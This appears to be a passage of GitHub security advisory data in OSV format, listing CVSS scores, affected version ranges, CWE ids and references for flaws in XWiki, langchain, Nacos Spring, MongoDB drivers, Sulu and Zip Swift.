[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1-milestone-2'}, {'fixed': '14.10.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h8cm-3v5f-rgp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40176'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-7847'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T19:59:12Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7gfq-f96f-g85j
|
2023-08-31T14:25:01Z
|
2023-08-22T21:30:27Z
| null |
['CVE-2023-36281']
|
langchain vulnerable to arbitrary code execution
|
An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.171'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36281'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/4394'}, {'type': 'WEB', 'url': 'https://aisec.today/LangChain-2e6244a313dd46139c5ef28cbcab9e55'}, {'type': 'PACKAGE', 'url': 'https://github.com/langchain-ai/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-151.yaml'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T13:22:25Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-v6c8-pwhq-288m
|
2023-09-01T17:33:29Z
|
2023-08-21T18:31:23Z
| null |
['CVE-2023-39106']
|
Nacos Spring vulnerable to Unsafe Deserialization
|
An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-spring-context'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39106'}, {'type': 'WEB', 'url': 'https://github.com/nacos-group/nacos-spring-project/issues/314'}, {'type': 'PACKAGE', 'url': 'https://github.com/nacos-group/nacos-spring-project'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:45:33Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vxvm-qww3-2fh7
|
2023-08-30T21:20:44Z
|
2023-08-29T18:31:53Z
| null |
['CVE-2021-32050']
|
MongoDB Driver may publish events containing authentication-related data
|
Some MongoDB Drivers may erroneously publish events containing authentication-related data to a command listener configured by an application. The published events may contain security-sensitive data when specific authentication-related commands are executed.
Without due care, an application may inadvertently expose this sensitive information, e.g., by writing it to a log file. This issue only arises if an application enables the command listener feature (this is not enabled by default).
This issue affects the MongoDB C Driver 1.0.0 prior to 1.17.7, MongoDB PHP Driver 1.0.0 prior to 1.9.2, MongoDB Swift Driver 1.0.0 prior to 1.1.1, MongoDB Node.js Driver 3.6 prior to 3.6.10, MongoDB Node.js Driver 4.0 prior to 4.17.0 and MongoDB Node.js Driver 5.0 prior to 5.8.0. This issue also affects users of the MongoDB C++ Driver dependent on the C driver 1.0.0 prior to 1.17.7 (C++ driver prior to 3.7.0).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'mongodb/mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.9.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.6.0'}, {'fixed': '3.6.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.17.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mongodb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.8.0'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/mongodb/mongo-swift-driver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.1.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32050'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-php-driver/pull/1235'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-swift-driver/pull/643'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-php-driver/commit/4495de8313c0d313e4dde906fc7aedf998ee3748'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/node-mongodb-native/commit/8c8b4c3b8c55f10fb96f63d3bbfa5d408b4ed7d0'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CDRIVER-3797'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/CXX-2028'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/NODE-3356'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/PHPC-1869'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/SWIFT-1229'}]
|
{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T21:20:44Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wmwf-49vv-p3mr
|
2023-08-04T13:31:19Z
|
2023-08-03T19:44:28Z
| null |
['CVE-2023-39343']
|
Sulu Observable Response Discrepancy on Admin Login
|
### Impact
It allows over the Admin Login form to detect which user (username, email) exists and which one do not exist.
Impacted by this issue are Sulu installation >= 2.5.0 and <2.5.10 using the newer Symfony Security System which is default since Symfony 6.0 but can be enabled in Symfony 5.4. Sulu Installation not using the old Symfony 5.4 security System and previous version are not impacted by this Security issue.
### Patches
The problem has been patched in version 2.5.10.
### Workarounds
Create a custom AuthenticationFailureHandler which does not return the `$exception->getMessage();` instead the `$exception->getMessageKey();`
### References
Currently no references.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-wmwf-49vv-p3mr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39343'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/5f6c98ba030b2005793e2dc647cc938937ea889b'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/sulu/sulu/CVE-2023-39343.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sulu/sulu'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/releases/tag/2.5.10'}]
|
{'cwe_ids': ['CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:44:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g454-wj9r-jpg4
|
2023-09-06T21:30:59Z
|
2023-08-31T00:30:17Z
| null |
['CVE-2023-39135']
|
Path traversal in Zip Swift
|
An issue in Zip Swift v2.1.2 allows attackers to execute a path traversal attack via a crafted zip entry.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/marmelroy/Zip'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39135'}, {'type': 'WEB', 'url': 'https://github.com/marmelroy/Zip/issues/245'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/marmelroy/Zip'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-1'}, {'type': 'WEB', 'url': 'https://security.snyk.io/research/zip-slip-vulnerability'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:41:10Z', 'nvd_published_at': None}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.